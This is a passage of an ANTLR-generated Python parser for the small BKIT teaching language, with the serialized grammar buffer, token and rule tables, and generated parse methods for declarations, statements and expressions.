buf.write(\"\\u009d\\4\\2\\t\\2\\4\\3\\t\\3\\4\\4\\t\\4\\4\\5\\t\\5\\4\\6\\t\\6\\4\\7\\t\\7\")\n buf.write(\"\\4\\b\\t\\b\\4\\t\\t\\t\\4\\n\\t\\n\\4\\13\\t\\13\\4\\f\\t\\f\\4\\r\\t\\r\\4\\16\")\n buf.write(\"\\t\\16\\4\\17\\t\\17\\4\\20\\t\\20\\4\\21\\t\\21\\4\\22\\t\\22\\3\\2\\3\\2\")\n buf.write(\"\\6\\2\\'\\n\\2\\r\\2\\16\\2(\\3\\2\\3\\2\\3\\3\\3\\3\\3\\3\\3\\3\\3\\4\\3\\4\\3\")\n buf.write(\"\\4\\3\\4\\3\\4\\3\\4\\7\\4\\67\\n\\4\\f\\4\\16\\4:\\13\\4\\3\\4\\5\\4=\\n\\4\")\n buf.write(\"\\3\\4\\3\\4\\3\\4\\3\\4\\3\\4\\3\\5\\3\\5\\7\\5F\\n\\5\\f\\5\\16\\5I\\13\\5\\3\")\n buf.write(\"\\6\\3\\6\\3\\6\\3\\7\\3\\7\\3\\7\\5\\7Q\\n\\7\\3\\7\\3\\7\\3\\b\\3\\b\\3\\b\\3\")\n buf.write(\"\\b\\3\\t\\3\\t\\3\\t\\7\\t\\\\\\n\\t\\f\\t\\16\\t_\\13\\t\\3\\t\\3\\t\\3\\n\\3\")\n buf.write(\"\\n\\3\\n\\3\\13\\3\\13\\3\\13\\3\\13\\3\\13\\5\\13k\\n\\13\\3\\f\\3\\f\\3\\f\")\n buf.write(\"\\3\\f\\3\\f\\5\\fr\\n\\f\\3\\r\\3\\r\\3\\r\\3\\r\\3\\r\\5\\ry\\n\\r\\3\\16\\3\")\n buf.write(\"\\16\\3\\16\\3\\16\\3\\16\\5\\16\\u0080\\n\\16\\3\\17\\3\\17\\3\\17\\3\\17\")\n buf.write(\"\\3\\17\\3\\17\\7\\17\\u0088\\n\\17\\f\\17\\16\\17\\u008b\\13\\17\\3\\20\")\n buf.write(\"\\3\\20\\3\\20\\3\\20\\5\\20\\u0091\\n\\20\\3\\21\\3\\21\\3\\21\\7\\21\\u0096\")\n buf.write(\"\\n\\21\\f\\21\\16\\21\\u0099\\13\\21\\3\\22\\3\\22\\3\\22\\2\\3\\34\\23\")\n buf.write(\"\\2\\4\\6\\b\\n\\f\\16\\20\\22\\24\\26\\30\\32\\34\\36 \\\"\\2\\4\\3\\2\\n\\13\")\n buf.write(\"\\3\\2\\7\\b\\2\\u009d\\2&\\3\\2\\2\\2\\4,\\3\\2\\2\\2\\6\\60\\3\\2\\2\\2\\b\")\n buf.write(\"G\\3\\2\\2\\2\\nJ\\3\\2\\2\\2\\fP\\3\\2\\2\\2\\16T\\3\\2\\2\\2\\20X\\3\\2\\2\")\n buf.write(\"\\2\\22b\\3\\2\\2\\2\\24j\\3\\2\\2\\2\\26q\\3\\2\\2\\2\\30x\\3\\2\\2\\2\\32\")\n buf.write(\"\\177\\3\\2\\2\\2\\34\\u0081\\3\\2\\2\\2\\36\\u0090\\3\\2\\2\\2 \\u0092\")\n buf.write(\"\\3\\2\\2\\2\\\"\\u009a\\3\\2\\2\\2$\\'\\5\\4\\3\\2%\\'\\5\\6\\4\\2&$\\3\\2\\2\")\n buf.write(\"\\2&%\\3\\2\\2\\2\\'(\\3\\2\\2\\2(&\\3\\2\\2\\2()\\3\\2\\2\\2)*\\3\\2\\2\\2\")\n buf.write(\"*+\\7\\2\\2\\3+\\3\\3\\2\\2\\2,-\\5\\\"\\22\\2-.\\5 \\21\\2./\\7\\25\\2\\2\")\n buf.write(\"/\\5\\3\\2\\2\\2\\60\\61\\5\\\"\\22\\2\\61\\62\\7\\30\\2\\2\\62<\\7\\r\\2\\2\")\n buf.write(\"\\63\\64\\5\\n\\6\\2\\64\\65\\7\\25\\2\\2\\65\\67\\3\\2\\2\\2\\66\\63\\3\\2\")\n buf.write(\"\\2\\2\\67:\\3\\2\\2\\28\\66\\3\\2\\2\\289\\3\\2\\2\\29;\\3\\2\\2\\2:8\\3\\2\")\n buf.write(\"\\2\\2;=\\5\\n\\6\\2<8\\3\\2\\2\\2<=\\3\\2\\2\\2=>\\3\\2\\2\\2>?\\7\\16\\2\")\n buf.write(\"\\2?@\\7\\21\\2\\2@A\\5\\b\\5\\2AB\\7\\22\\2\\2B\\7\\3\\2\\2\\2CF\\5\\4\\3\")\n buf.write(\"\\2DF\\5\\f\\7\\2EC\\3\\2\\2\\2ED\\3\\2\\2\\2FI\\3\\2\\2\\2GE\\3\\2\\2\\2G\")\n buf.write(\"H\\3\\2\\2\\2H\\t\\3\\2\\2\\2IG\\3\\2\\2\\2JK\\5\\\"\\22\\2KL\\5 \\21\\2L\\13\")\n buf.write(\"\\3\\2\\2\\2MQ\\5\\16\\b\\2NQ\\5\\20\\t\\2OQ\\5\\22\\n\\2PM\\3\\2\\2\\2PN\")\n buf.write(\"\\3\\2\\2\\2PO\\3\\2\\2\\2QR\\3\\2\\2\\2RS\\7\\25\\2\\2S\\r\\3\\2\\2\\2TU\\7\")\n buf.write(\"\\30\\2\\2UV\\7\\27\\2\\2VW\\5\\24\\13\\2W\\17\\3\\2\\2\\2XY\\7\\30\\2\\2\")\n buf.write(\"Y]\\7\\r\\2\\2Z\\\\\\5 \\21\\2[Z\\3\\2\\2\\2\\\\_\\3\\2\\2\\2][\\3\\2\\2\\2]\")\n buf.write(\"^\\3\\2\\2\\2^`\\3\\2\\2\\2_]\\3\\2\\2\\2`a\\7\\16\\2\\2a\\21\\3\\2\\2\\2b\")\n buf.write(\"c\\7\\6\\2\\2cd\\5\\24\\13\\2d\\23\\3\\2\\2\\2ek\\5\\30\\r\\2fg\\7\\r\\2\\2\")\n buf.write(\"gh\\5\\26\\f\\2hi\\7\\16\\2\\2ik\\3\\2\\2\\2je\\3\\2\\2\\2jf\\3\\2\\2\\2k\")\n buf.write(\"\\25\\3\\2\\2\\2lr\\5\\24\\13\\2mn\\7\\r\\2\\2no\\5\\26\\f\\2op\\7\\16\\2\")\n buf.write(\"\\2pr\\3\\2\\2\\2ql\\3\\2\\2\\2qm\\3\\2\\2\\2r\\27\\3\\2\\2\\2st\\5\\32\\16\")\n buf.write(\"\\2tu\\7\\t\\2\\2uv\\5\\30\\r\\2vy\\3\\2\\2\\2wy\\5\\32\\16\\2xs\\3\\2\\2\")\n buf.write(\"\\2xw\\3\\2\\2\\2y\\31\\3\\2\\2\\2z{\\5\\34\\17\\2{|\\t\\2\\2\\2|}\\5\\32\")\n buf.write(\"\\16\\2}\\u0080\\3\\2\\2\\2~\\u0080\\5\\34\\17\\2\\177z\\3\\2\\2\\2\\177\")\n buf.write(\"~\\3\\2\\2\\2\\u0080\\33\\3\\2\\2\\2\\u0081\\u0082\\b\\17\\1\\2\\u0082\")\n buf.write(\"\\u0083\\5\\36\\20\\2\\u0083\\u0089\\3\\2\\2\\2\\u0084\\u0085\\f\\4\\2\")\n buf.write(\"\\2\\u0085\\u0086\\7\\f\\2\\2\\u0086\\u0088\\5\\34\\17\\5\\u0087\\u0084\")\n buf.write(\"\\3\\2\\2\\2\\u0088\\u008b\\3\\2\\2\\2\\u0089\\u0087\\3\\2\\2\\2\\u0089\")\n buf.write(\"\\u008a\\3\\2\\2\\2\\u008a\\35\\3\\2\\2\\2\\u008b\\u0089\\3\\2\\2\\2\\u008c\")\n buf.write(\"\\u0091\\7\\3\\2\\2\\u008d\\u0091\\7\\4\\2\\2\\u008e\\u0091\\7\\30\\2\")\n buf.write(\"\\2\\u008f\\u0091\\5\\20\\t\\2\\u0090\\u008c\\3\\2\\2\\2\\u0090\\u008d\")\n buf.write(\"\\3\\2\\2\\2\\u0090\\u008e\\3\\2\\2\\2\\u0090\\u008f\\3\\2\\2\\2\\u0091\")\n buf.write(\"\\37\\3\\2\\2\\2\\u0092\\u0097\\7\\30\\2\\2\\u0093\\u0094\\7\\26\\2\\2\")\n buf.write(\"\\u0094\\u0096\\7\\30\\2\\2\\u0095\\u0093\\3\\2\\2\\2\\u0096\\u0099\")\n buf.write(\"\\3\\2\\2\\2\\u0097\\u0095\\3\\2\\2\\2\\u0097\\u0098\\3\\2\\2\\2\\u0098\")\n buf.write(\"!\\3\\2\\2\\2\\u0099\\u0097\\3\\2\\2\\2\\u009a\\u009b\\t\\3\\2\\2\\u009b\")\n buf.write(\"#\\3\\2\\2\\2\\21&(8<EGP]jqx\\177\\u0089\\u0090\\u0097\")\n return buf.getvalue()\n\n\nclass BKITParser ( Parser ):\n\n grammarFileName = \"BKIT.g4\"\n\n atn = ATNDeserializer().deserialize(serializedATN())\n\n decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]\n\n sharedContextCache = PredictionContextCache()\n\n literalNames = [ \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \n \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \"'+'\", \"'-'\", \n \"'*'\", \"'/'\", \"'('\", \"')'\", \"'['\", \"']'\", \"'{'\", \"'}'\", \n \"':'\", \"'.'\", \"';'\", \"','\", \"'='\" ]\n\n symbolicNames = [ \"<INVALID>\", \"Integer_literal\", \"Float_literal\", \"String_literal\", \n \"RETURN\", \"INT\", \"FLOAT\", \"PLUS_INT\", \"MINUS_INT\", \n \"STAR_INT\", \"DIV_INT\", \"LEFT_PAREN\", \"RIGHT_PAREN\", \n \"LEFT_BRACKET\", \"RIGHT_BRACKET\", \"LEFT_BRACE\", \"RIGHT_BRACE\", \n \"COLON\", \"DOT\", \"SEMI\", \"COMMA\", \"ASSIGN\", \"ID\", \"ILLEGAL_ESCAPE\", \n \"UNCLOSE_STRING\", \"COMMENT\", \"UNTERMINATED_COMMENT\", \n \"ERROR_CHAR\", \"WS\" ]\n\n RULE_program = 0\n RULE_var_declare = 1\n RULE_function_declare = 2\n RULE_function_body = 3\n RULE_ids_list_with_type = 4\n RULE_stmt = 5\n RULE_assign_stmt = 6\n RULE_call_stmt = 7\n RULE_ret_stmt = 8\n RULE_expr = 9\n RULE_subexpr = 10\n RULE_expr0 = 11\n RULE_expr1 = 12\n RULE_expr2 = 13\n RULE_operand = 14\n RULE_ids_list = 15\n RULE_primitive_type = 16\n\n ruleNames = [ \"program\", \"var_declare\", \"function_declare\", \"function_body\", \n \"ids_list_with_type\", \"stmt\", \"assign_stmt\", \"call_stmt\", \n \"ret_stmt\", \"expr\", \"subexpr\", \"expr0\", \"expr1\", \"expr2\", \n \"operand\", \"ids_list\", \"primitive_type\" ]\n\n EOF = Token.EOF\n Integer_literal=1\n Float_literal=2\n String_literal=3\n RETURN=4\n INT=5\n FLOAT=6\n PLUS_INT=7\n MINUS_INT=8\n STAR_INT=9\n DIV_INT=10\n LEFT_PAREN=11\n RIGHT_PAREN=12\n LEFT_BRACKET=13\n RIGHT_BRACKET=14\n LEFT_BRACE=15\n RIGHT_BRACE=16\n COLON=17\n DOT=18\n SEMI=19\n COMMA=20\n ASSIGN=21\n ID=22\n ILLEGAL_ESCAPE=23\n UNCLOSE_STRING=24\n COMMENT=25\n UNTERMINATED_COMMENT=26\n ERROR_CHAR=27\n WS=28\n\n def __init__(self, input:TokenStream, output:TextIO = sys.stdout):\n super().__init__(input, output)\n self.checkVersion(\"4.8\")\n self._interp = ParserATNSimulator(self, self.atn, self.decisionsToDFA, self.sharedContextCache)\n self._predicates = None\n\n\n\n\n class ProgramContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def EOF(self):\n return self.getToken(BKITParser.EOF, 0)\n\n def var_declare(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_declareContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_declareContext,i)\n\n\n def function_declare(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Function_declareContext)\n else:\n return self.getTypedRuleContext(BKITParser.Function_declareContext,i)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_program\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitProgram\" ):\n return visitor.visitProgram(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def program(self):\n\n localctx = BKITParser.ProgramContext(self, self._ctx, self.state)\n self.enterRule(localctx, 0, self.RULE_program)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 36 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while True:\n self.state = 36\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,0,self._ctx)\n if la_ == 1:\n self.state = 34\n self.var_declare()\n pass\n\n elif la_ == 2:\n self.state = 35\n self.function_declare()\n pass\n\n\n self.state = 38 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if not (_la==BKITParser.INT or _la==BKITParser.FLOAT):\n break\n\n self.state = 40\n self.match(BKITParser.EOF)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_declareContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def primitive_type(self):\n return self.getTypedRuleContext(BKITParser.Primitive_typeContext,0)\n\n\n def ids_list(self):\n return self.getTypedRuleContext(BKITParser.Ids_listContext,0)\n\n\n def SEMI(self):\n return self.getToken(BKITParser.SEMI, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_declare\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitVar_declare\" ):\n return visitor.visitVar_declare(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def var_declare(self):\n\n localctx = BKITParser.Var_declareContext(self, self._ctx, self.state)\n self.enterRule(localctx, 2, self.RULE_var_declare)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 42\n self.primitive_type()\n self.state = 43\n self.ids_list()\n self.state = 44\n self.match(BKITParser.SEMI)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Function_declareContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def primitive_type(self):\n return self.getTypedRuleContext(BKITParser.Primitive_typeContext,0)\n\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def LEFT_PAREN(self):\n return self.getToken(BKITParser.LEFT_PAREN, 0)\n\n def RIGHT_PAREN(self):\n return self.getToken(BKITParser.RIGHT_PAREN, 0)\n\n def LEFT_BRACE(self):\n return self.getToken(BKITParser.LEFT_BRACE, 0)\n\n def function_body(self):\n return self.getTypedRuleContext(BKITParser.Function_bodyContext,0)\n\n\n def RIGHT_BRACE(self):\n return self.getToken(BKITParser.RIGHT_BRACE, 0)\n\n def ids_list_with_type(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Ids_list_with_typeContext)\n else:\n return self.getTypedRuleContext(BKITParser.Ids_list_with_typeContext,i)\n\n\n def SEMI(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.SEMI)\n else:\n return self.getToken(BKITParser.SEMI, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_function_declare\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitFunction_declare\" ):\n return visitor.visitFunction_declare(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def function_declare(self):\n\n localctx = BKITParser.Function_declareContext(self, self._ctx, self.state)\n self.enterRule(localctx, 4, self.RULE_function_declare)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 46\n self.primitive_type()\n self.state = 47\n self.match(BKITParser.ID)\n self.state = 48\n self.match(BKITParser.LEFT_PAREN)\n self.state = 58\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if _la==BKITParser.INT or _la==BKITParser.FLOAT:\n self.state = 54\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,2,self._ctx)\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n self.state = 49\n self.ids_list_with_type()\n self.state = 50\n self.match(BKITParser.SEMI) \n self.state = 56\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,2,self._ctx)\n\n self.state = 57\n self.ids_list_with_type()\n\n\n self.state = 60\n self.match(BKITParser.RIGHT_PAREN)\n self.state = 61\n self.match(BKITParser.LEFT_BRACE)\n self.state = 62\n self.function_body()\n self.state = 63\n self.match(BKITParser.RIGHT_BRACE)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Function_bodyContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def var_declare(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_declareContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_declareContext,i)\n\n\n def stmt(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.StmtContext)\n else:\n return self.getTypedRuleContext(BKITParser.StmtContext,i)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_function_body\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitFunction_body\" ):\n return visitor.visitFunction_body(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def function_body(self):\n\n localctx = BKITParser.Function_bodyContext(self, self._ctx, self.state)\n self.enterRule(localctx, 6, self.RULE_function_body)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 69\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.RETURN) | (1 << BKITParser.INT) | (1 << BKITParser.FLOAT) | (1 << BKITParser.ID))) != 0):\n self.state = 67\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.INT, BKITParser.FLOAT]:\n self.state = 65\n self.var_declare()\n pass\n elif token in [BKITParser.RETURN, BKITParser.ID]:\n self.state = 66\n self.stmt()\n pass\n else:\n raise NoViableAltException(self)\n\n self.state = 71\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Ids_list_with_typeContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def primitive_type(self):\n return self.getTypedRuleContext(BKITParser.Primitive_typeContext,0)\n\n\n def ids_list(self):\n return self.getTypedRuleContext(BKITParser.Ids_listContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_ids_list_with_type\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitIds_list_with_type\" ):\n return visitor.visitIds_list_with_type(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def ids_list_with_type(self):\n\n localctx = BKITParser.Ids_list_with_typeContext(self, self._ctx, self.state)\n self.enterRule(localctx, 8, self.RULE_ids_list_with_type)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 72\n self.primitive_type()\n self.state = 73\n self.ids_list()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class StmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def SEMI(self):\n return self.getToken(BKITParser.SEMI, 0)\n\n def assign_stmt(self):\n return self.getTypedRuleContext(BKITParser.Assign_stmtContext,0)\n\n\n def call_stmt(self):\n return self.getTypedRuleContext(BKITParser.Call_stmtContext,0)\n\n\n def ret_stmt(self):\n return self.getTypedRuleContext(BKITParser.Ret_stmtContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_stmt\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitStmt\" ):\n return visitor.visitStmt(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def stmt(self):\n\n localctx = BKITParser.StmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 10, self.RULE_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 78\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,6,self._ctx)\n if la_ == 1:\n self.state = 75\n self.assign_stmt()\n pass\n\n elif la_ == 2:\n self.state = 76\n self.call_stmt()\n pass\n\n elif la_ == 3:\n self.state = 77\n self.ret_stmt()\n pass\n\n\n self.state = 80\n self.match(BKITParser.SEMI)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Assign_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_assign_stmt\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitAssign_stmt\" ):\n return visitor.visitAssign_stmt(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def assign_stmt(self):\n\n localctx = BKITParser.Assign_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 12, self.RULE_assign_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 82\n self.match(BKITParser.ID)\n self.state = 83\n self.match(BKITParser.ASSIGN)\n self.state = 84\n self.expr()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Call_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def LEFT_PAREN(self):\n return self.getToken(BKITParser.LEFT_PAREN, 0)\n\n def RIGHT_PAREN(self):\n return self.getToken(BKITParser.RIGHT_PAREN, 0)\n\n def ids_list(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Ids_listContext)\n else:\n return self.getTypedRuleContext(BKITParser.Ids_listContext,i)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_call_stmt\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitCall_stmt\" ):\n return visitor.visitCall_stmt(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def call_stmt(self):\n\n localctx = BKITParser.Call_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 14, self.RULE_call_stmt)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 86\n self.match(BKITParser.ID)\n self.state = 87\n self.match(BKITParser.LEFT_PAREN)\n self.state = 91\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.ID:\n self.state = 88\n self.ids_list()\n self.state = 93\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 94\n self.match(BKITParser.RIGHT_PAREN)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Ret_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def RETURN(self):\n return self.getToken(BKITParser.RETURN, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_ret_stmt\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitRet_stmt\" ):\n return visitor.visitRet_stmt(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def ret_stmt(self):\n\n localctx = BKITParser.Ret_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 16, self.RULE_ret_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 96\n self.match(BKITParser.RETURN)\n self.state = 97\n self.expr()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class ExprContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr0(self):\n return self.getTypedRuleContext(BKITParser.Expr0Context,0)\n\n\n def LEFT_PAREN(self):\n return self.getToken(BKITParser.LEFT_PAREN, 0)\n\n def subexpr(self):\n return self.getTypedRuleContext(BKITParser.SubexprContext,0)\n\n\n def RIGHT_PAREN(self):\n return self.getToken(BKITParser.RIGHT_PAREN, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitExpr\" ):\n return visitor.visitExpr(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def expr(self):\n\n localctx = BKITParser.ExprContext(self, self._ctx, self.state)\n self.enterRule(localctx, 18, self.RULE_expr)\n try:\n self.state = 104\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.Integer_literal, BKITParser.Float_literal, BKITParser.ID]:\n self.enterOuterAlt(localctx, 1)\n self.state = 99\n self.expr0()\n pass\n elif token in [BKITParser.LEFT_PAREN]:\n self.enterOuterAlt(localctx, 2)\n self.state = 100\n self.match(BKITParser.LEFT_PAREN)\n self.state = 101\n self.subexpr()\n self.state = 102\n self.match(BKITParser.RIGHT_PAREN)\n pass\n else:\n raise NoViableAltException(self)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class SubexprContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def LEFT_PAREN(self):\n return self.getToken(BKITParser.LEFT_PAREN, 0)\n\n def subexpr(self):\n return self.getTypedRuleContext(BKITParser.SubexprContext,0)\n\n\n def RIGHT_PAREN(self):\n return self.getToken(BKITParser.RIGHT_PAREN, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_subexpr\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitSubexpr\" ):\n return visitor.visitSubexpr(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def subexpr(self):\n\n localctx = BKITParser.SubexprContext(self, self._ctx, self.state)\n self.enterRule(localctx, 20, self.RULE_subexpr)\n try:\n self.state = 111\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,9,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 106\n self.expr()\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 107\n self.match(BKITParser.LEFT_PAREN)\n self.state = 108\n self.subexpr()\n self.state = 109\n self.match(BKITParser.RIGHT_PAREN)\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr0Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr1(self):\n return self.getTypedRuleContext(BKITParser.Expr1Context,0)\n\n\n def PLUS_INT(self):\n return self.getToken(BKITParser.PLUS_INT, 0)\n\n def expr0(self):\n return self.getTypedRuleContext(BKITParser.Expr0Context,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr0\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitExpr0\" ):\n return visitor.visitExpr0(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def expr0(self):\n\n localctx = BKITParser.Expr0Context(self, self._ctx, self.state)\n self.enterRule(localctx, 22, self.RULE_expr0)\n try:\n self.state = 118\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,10,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 113\n self.expr1()\n self.state = 114\n self.match(BKITParser.PLUS_INT)\n self.state = 115\n self.expr0()\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 117\n self.expr1()\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr1Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr2(self):\n return self.getTypedRuleContext(BKITParser.Expr2Context,0)\n\n\n def expr1(self):\n return self.getTypedRuleContext(BKITParser.Expr1Context,0)\n\n\n def 